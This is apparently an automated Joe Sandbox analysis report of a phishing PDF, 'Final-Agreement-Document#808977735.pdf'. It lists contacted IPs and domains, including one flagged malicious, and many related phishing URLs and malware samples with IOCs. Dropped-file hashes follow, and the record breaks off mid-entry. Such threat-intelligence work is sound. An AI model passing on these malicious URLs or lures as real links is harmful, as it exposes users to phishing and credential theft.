                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.18.94.41
                                                            challenges.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            151.101.130.137
                                                            unknownUnited States
                                                            54113FASTLYUSfalse
                                                            108.179.252.84
                                                            aifunygg.planaltinashopping.com.brUnited States
                                                            46606UNIFIEDLAYER-AS-1USfalse
                                                            151.101.194.137
                                                            code.jquery.comUnited States
                                                            54113FASTLYUSfalse
                                                            35.190.80.1
                                                            a.nel.cloudflare.comUnited States
                                                            15169GOOGLEUSfalse
                                                            104.18.95.41
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            188.114.96.3
                                                            qelira.qelirathor.ruEuropean Union
                                                            13335CLOUDFLARENETUStrue
                                                            142.250.186.100
                                                            www.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            IP
                                                            192.168.2.4
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1591527
                                                            Start date and time:2025-01-15 02:56:59 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 5s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:defaultwindowspdfcookbook.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:13
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Final-Agreement-Document#808977735.pdf
                                                            Detection:MAL
                                                            Classification:mal68.phis.winPDF@46/76@25/10
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .pdf
                                                            • Found PDF document
                                                            • Close Viewer
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 2.23.240.205, 2.16.168.105, 2.16.168.107, 52.6.155.20, 3.233.129.217, 52.22.41.97, 3.219.243.226, 162.159.61.3, 172.64.41.3, 23.209.209.135, 199.232.210.172, 184.30.131.245, 142.250.185.163, 142.250.186.110, 108.177.15.84, 142.250.184.238, 216.58.206.78, 216.58.212.138, 142.250.186.42, 216.58.212.170, 142.250.74.202, 142.250.185.106, 142.250.185.234, 142.250.186.170, 142.250.185.170, 216.58.206.74, 142.250.185.74, 142.250.185.138, 142.250.186.106, 172.217.16.202, 142.250.185.202, 142.250.184.234, 142.250.186.74, 142.250.186.174, 142.250.186.46, 172.217.18.110, 142.250.185.206, 142.250.184.206, 142.250.65.238, 74.125.0.74, 142.250.185.131, 172.217.18.10, 142.250.184.202, 142.250.181.234, 172.217.23.106, 216.58.206.42, 172.217.16.138, 142.250.186.138, 2.23.242.162, 23.203.104.175, 52.149.20.212, 13.107.246.45
                                                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, r5.sn-t0aedn7e.gvt1.com, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, armmf.adobe.com, r5---sn-t0aedn7e.gvt1.com, clients.l.google.com, geo2.adobe.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            TimeTypeDescription
                                                            20:58:13API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.18.94.41https://informed.deliveryery.top/us/Get hashmaliciousHTMLPhisherBrowse
                                                              https://api-smartdappsfix.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                http://telemgram-rv.org/Get hashmaliciousHTMLPhisherBrowse
                                                                  https://6y.tickarmoz.ru/aY57/Get hashmaliciousUnknownBrowse
                                                                    Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                                      https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789Get hashmaliciousUnknownBrowse
                                                                        logitix.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                          EFT_Payment_Notification_Gheenirrigation.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            Document_31055.pdfGet hashmaliciousUnknownBrowse
                                                                              https://u5fv5thbb.cc.rs6.net/tn.jsp?f=001afWrpwCCI2iWUYbszOdwR1t-F0r_p2RGqIn0ncIGJMjdaOM_jQztL2YPmQvt1RwZdAfxf04J-YjkHFOHZPykwyeYjQ4jxhrp3R9ukIwbkymQTpm5mx66BC8isp_B2wncmFDUfjjBx4d0YXiDu3Nc77CSIweAs2ttJcycn-zsNnmgSBgvzRxIsANxjwCYrOKv75WAuwEQwGhM_zCMclXjGqvRsMBSOB_zxaR0ec-_RI8dWprXwmKrbaxahswkhBPJ&c=iov1_LdPHvUx2ChSLIucZWqsBXy1GpnpLdHBEmuzLivt4j5stH_55g==&ch=I1Y8e9rJ4WxwWWgomI7efPIFsqm6CDFWFpV-o6w0qPgtUQs3xBpKiA==Get hashmaliciousUnknownBrowse
                                                                                108.179.252.84https://www.google.com/amp/url.rw/6r6nsGet hashmaliciousUnknownBrowse
                                                                                  151.101.194.137http://facebooksecurity.blogspot.dk/Get hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.7.min.js
                                                                                  http://soporte-store.info/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.11.3.min.js
                                                                                  http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.11.3.min.js
                                                                                  http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.9.1.js
                                                                                  http://facebooksecurity.blogspot.pe/Get hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.7.min.js
                                                                                  https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=demsaenlinea.mx/jahn/00987667839933/utilities@affordablecare.comGet hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-3.3.1.min.js
                                                                                  151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.11.3.min.js
                                                                                  http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.11.3.min.js
                                                                                  http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.7.min.js
                                                                                  https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-3.3.1.min.js
                                                                                  http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.7.2.min.js
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  code.jquery.comhttps://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                  • 151.101.130.137
                                                                                  https://suman006723213.github.io/garena.reward.ff/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 151.101.194.137
                                                                                  http://optimize-system-upgrades.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 151.101.194.137
                                                                                  https://bafkreibsbjyfimxhx74m5tcypjri7hfpts4m6rwijhar7bcrbkwhh2xgbe.ipfs.flk-ipfs.xyz/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 151.101.66.137
                                                                                  https://6y.tickarmoz.ru/aY57/Get hashmaliciousUnknownBrowse
                                                                                  • 151.101.194.137
                                                                                  Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                                                  • 151.101.130.137
                                                                                  https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789Get hashmaliciousUnknownBrowse
                                                                                  • 151.101.194.137
                                                                                  logitix.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 151.101.66.137
                                                                                  EFT_Payment_Notification_Gheenirrigation.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 151.101.2.137
                                                                                  Document_31055.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 151.101.2.137
                                                                                  challenges.cloudflare.comhttps://informed.deliveryery.top/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.95.41
                                                                                  https://api-smartdappsfix.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.94.41
                                                                                  http://telemgram-rv.org/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.94.41
                                                                                  https://6y.tickarmoz.ru/aY57/Get hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789Get hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  logitix.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.95.41
                                                                                  EFT_Payment_Notification_Gheenirrigation.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.94.41
                                                                                  Document_31055.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  https://u5fv5thbb.cc.rs6.net/tn.jsp?f=001afWrpwCCI2iWUYbszOdwR1t-F0r_p2RGqIn0ncIGJMjdaOM_jQztL2YPmQvt1RwZdAfxf04J-YjkHFOHZPykwyeYjQ4jxhrp3R9ukIwbkymQTpm5mx66BC8isp_B2wncmFDUfjjBx4d0YXiDu3Nc77CSIweAs2ttJcycn-zsNnmgSBgvzRxIsANxjwCYrOKv75WAuwEQwGhM_zCMclXjGqvRsMBSOB_zxaR0ec-_RI8dWprXwmKrbaxahswkhBPJ&c=iov1_LdPHvUx2ChSLIucZWqsBXy1GpnpLdHBEmuzLivt4j5stH_55g==&ch=I1Y8e9rJ4WxwWWgomI7efPIFsqm6CDFWFpV-o6w0qPgtUQs3xBpKiA==Get hashmaliciousUnknownBrowse
                                                                                  • 104.18.95.41
                                                                                  bg.microsoft.map.fastly.nettTbeoLWNhb.dllGet hashmaliciousWannacryBrowse
                                                                                  • 199.232.214.172
                                                                                  Document-01-16-25.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.214.172
                                                                                  v9xYj92wR3.dllGet hashmaliciousWannacryBrowse
                                                                                  • 199.232.214.172
                                                                                  https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9dGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.214.172
                                                                                  FjSrGs0AE2.dllGet hashmaliciousWannacryBrowse
                                                                                  • 199.232.214.172
                                                                                  jgd5ZGl1vA.dllGet hashmaliciousWannacryBrowse
                                                                                  • 199.232.214.172
                                                                                  logitix.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 199.232.214.172
                                                                                  DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.214.172
                                                                                  62.122.184.98 (2).ps1Get hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  FASTLYUShttps://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Computer-Zubehoer/b/?ie=UTF8&node=340843031&ref_=nav_cs_pcGet hashmaliciousUnknownBrowse
                                                                                  • 151.101.65.16
                                                                                  https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                                                  • 151.101.129.16
                                                                                  https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/NYNY25/?_encoding=UTF8&pd_rd_w=WqHp4&content-id=amzn1.sym.33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_p=33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                                                  • 151.101.65.16
                                                                                  https://ziyahid.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 185.199.108.153
                                                                                  https://tvtsrilanka.com/Agrr/Get hashmaliciousUnknownBrowse
                                                                                  • 151.101.129.229
                                                                                  http://metapromation.vercel.app/pagez/Get hashmaliciousUnknownBrowse
                                                                                  • 151.101.129.229
                                                                                  https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.192.193
                                                                                  http://fbmatrixgrowth-zeta.vercel.app/pagez/Get hashmaliciousUnknownBrowse
                                                                                  • 151.101.65.229
                                                                                  https://yolocdh.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 151.101.1.46
                                                                                  https://informed.deliveryery.top/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 151.101.129.140
                                                                                  UNIFIEDLAYER-AS-1USmitel.docxGet hashmaliciousUnknownBrowse
                                                                                  • 162.241.253.231
                                                                                  https://bafkreibsbjyfimxhx74m5tcypjri7hfpts4m6rwijhar7bcrbkwhh2xgbe.ipfs.flk-ipfs.xyz/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 108.167.142.88
                                                                                  https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789Get hashmaliciousUnknownBrowse
                                                                                  • 50.6.174.34
                                                                                  logitix.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 69.49.230.198
                                                                                  Document_31055.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 108.167.132.254
                                                                                  http://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 69.49.230.198
                                                                                  Ecastillo-In Service Agreement.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 69.49.230.198
                                                                                  https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fjobuli.in%2Fwinner%2FsXtxg%2FbWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 69.49.230.198
                                                                                  https://umanocosmetic.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPVpHcG5ZM0U9JnVpZD1VU0VSMDkwMTIwMjVVNTgwMTA5NTY=N0123N%5BEMAIL%5DGet hashmaliciousUnknownBrowse
                                                                                  • 192.185.221.152
                                                                                  https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 69.49.230.198
                                                                                  CLOUDFLARENETUSEXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.25.14
                                                                                  https://tvtsrilanka.com/Agrr/Get hashmaliciousUnknownBrowse
                                                                                  • 104.18.11.207
                                                                                  http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 172.66.0.235
                                                                                  http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 172.66.0.235
                                                                                  http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 172.66.0.235
                                                                                  http://industrious-tomato-ngvkcs.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                  • 104.17.24.14
                                                                                  https://cdn.trytraffics.com/rdr/YWE9MzUyODAwODkxJnNlaT0zMDQ3NDU3NCZ0az1JR0doTXJGNXNpVnJBYzZkWlBUWSZ0PTUmYz05MGFzODc2ZmQ4OWFzNWZnOGEwOXM=Get hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.25.14
                                                                                  https://informed.deliveryery.top/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.21.72.161
                                                                                  https://dev.nflxdualsubtitles.com/Get hashmaliciousUnknownBrowse
                                                                                  • 172.67.15.14
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):292
                                                                                  Entropy (8bit):5.164078891996957
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:iO89D9yq2Pwkn2nKuAl9OmbnIFUtW9TZmFz1Zmwo9TZmFlRkwOwkn2nKuAl9Omb5:7ShyvYfHAahFUtwTZmX/eTZmjR5JfHAR
                                                                                  MD5:7BBA410A9140B2534F36EF80986B0D6B
                                                                                  SHA1:7629A257D9F146CBCE1F0CB9D863AD9D61E56F07
                                                                                  SHA-256:1581B83508A432A86DA828EF11AFFDE2C379DCC61FEE7F2A4CCDF9066584444E
                                                                                  SHA-512:CE8C5E87E107D466C02FAF38029F96857FDD05D5D7EF2F19AAD7413654AE2993FBF8CC7F9F0EE541B11CD81F8C07DC84AEEEB70A7CA3327C28DD15BA299955F1
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:2025/01/14-20:58:00.870 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-20:58:00.873 1e70 Recovering log #3.2025/01/14-20:58:00.873 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):292
                                                                                  Entropy (8bit):5.164078891996957
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:iO89D9yq2Pwkn2nKuAl9OmbnIFUtW9TZmFz1Zmwo9TZmFlRkwOwkn2nKuAl9Omb5:7ShyvYfHAahFUtwTZmX/eTZmjR5JfHAR
                                                                                  MD5:7BBA410A9140B2534F36EF80986B0D6B
                                                                                  SHA1:7629A257D9F146CBCE1F0CB9D863AD9D61E56F07
                                                                                  SHA-256:1581B83508A432A86DA828EF11AFFDE2C379DCC61FEE7F2A4CCDF9066584444E
                                                                                  SHA-512:CE8C5E87E107D466C02FAF38029F96857FDD05D5D7EF2F19AAD7413654AE2993FBF8CC7F9F0EE541B11CD81F8C07DC84AEEEB70A7CA3327C28DD15BA299955F1
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:2025/01/14-20:58:00.870 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-20:58:00.873 1e70 Recovering log #3.2025/01/14-20:58:00.873 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):336
                                                                                  Entropy (8bit):5.20211679253846
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:iO896+q2Pwkn2nKuAl9Ombzo2jMGIFUtW9gWZmwo9oNVkwOwkn2nKuAl9Ombzo23:7S6+vYfHAa8uFUtwgW/eoNV5JfHAa8RJ
                                                                                  MD5:426C5A4F596FEF0F19707FFC4E56767F
                                                                                  SHA1:B8848B4D7A829C23120CD9216405B913B930FD87
                                                                                  SHA-256:928B82807668E38FAF57C382DA6F3CE09B1E4FCF9549FFB5FE6A50128830C7F3
                                                                                  SHA-512:B273B27BD4CD4D3F77471CBEDB0254D01FB7CDCBDC859F998D6DD4E3FF83CF28BB708A96E6E58E67A7DB35A930895D43A3C66552DF51BC7A5A2514BE2D209C9A
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:2025/01/14-20:58:00.897 1f3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-20:58:00.898 1f3c Recovering log #3.2025/01/14-20:58:00.899 1f3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):336
                                                                                  Entropy (8bit):5.20211679253846
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:iO896+q2Pwkn2nKuAl9Ombzo2jMGIFUtW9gWZmwo9oNVkwOwkn2nKuAl9Ombzo23:7S6+vYfHAa8uFUtwgW/eoNV5JfHAa8RJ
                                                                                  MD5:426C5A4F596FEF0F19707FFC4E56767F
                                                                                  SHA1:B8848B4D7A829C23120CD9216405B913B930FD87
                                                                                  SHA-256:928B82807668E38FAF57C382DA6F3CE09B1E4FCF9549FFB5FE6A50128830C7F3
                                                                                  SHA-512:B273B27BD4CD4D3F77471CBEDB0254D01FB7CDCBDC859F998D6DD4E3FF83CF28BB708A96E6E58E67A7DB35A930895D43A3C66552DF51BC7A5A2514BE2D209C9A
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:2025/01/14-20:58:00.897 1f3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-20:58:00.898 1f3c Recovering log #3.2025/01/14-20:58:00.899 1f3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:JSON data
                                                                                  Category:modified
                                                                                  Size (bytes):475
                                                                                  Entropy (8bit):4.955941029595462
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:YH/um3RA8sqP3ksBdOg2HIAcaq3QYiubInP7E4T3y:Y2sRdsY5dMHIr3QYhbG7nby
                                                                                  MD5:40878123F5394A9D80EC5E79148D2606
                                                                                  SHA1:C79EA67A8B0DDCEFD3F89D16C3070784BC2957C7
                                                                                  SHA-256:0B21AC46B36C3A6C4FECECBD40F1B7F9954C69E41899AE300AF2871E6E088497
                                                                                  SHA-512:A463DDEBECB052B8A569DD8EA964CE02AACE121028C97D2406C1D11DE682A6E836C8C573295B4A9545751E10FD9721173069D4E1FFB4038B94563EC5E4496730
                                                                                  Malicious:false
                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381466293425681","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":121016},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
